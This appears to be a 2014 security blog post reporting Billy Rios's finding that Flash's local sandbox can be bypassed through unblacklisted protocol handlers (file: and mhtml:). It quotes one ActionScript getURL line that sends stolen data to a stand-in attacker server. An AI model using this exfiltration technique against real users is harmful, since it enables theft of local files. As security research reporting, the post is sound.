November 22, 2014

Bypass Flash Player Sandbox

Adobe Flash applications run locally can access to the local files and transfer them to the attacker server.

Adobe has implemented a number of sandboxes to enhance the user’s security. However, the imposed restrictions by sandboxes are depending to the origin and access rights of the SWF file. Hence, the local SWF files run within the local-with-file-system sandbox and are permitted to access to the local files without an access to the network.

However, the security researcher, Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. Therefore, it is possible to send files to a server using the file: protocol handler. Nevertheless, this is only possible within the local area network.

Billy Rios has identified other protocol handler which can be used to send data to remote servers by mhtml and using the ActionScript command: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”); from the victim PC.

Share and Enjoy:
  • Print
  • Digg
  • StumbleUpon
  • del.icio.us
  • Facebook
  • Yahoo! Buzz
  • Twitter
  • Google Bookmarks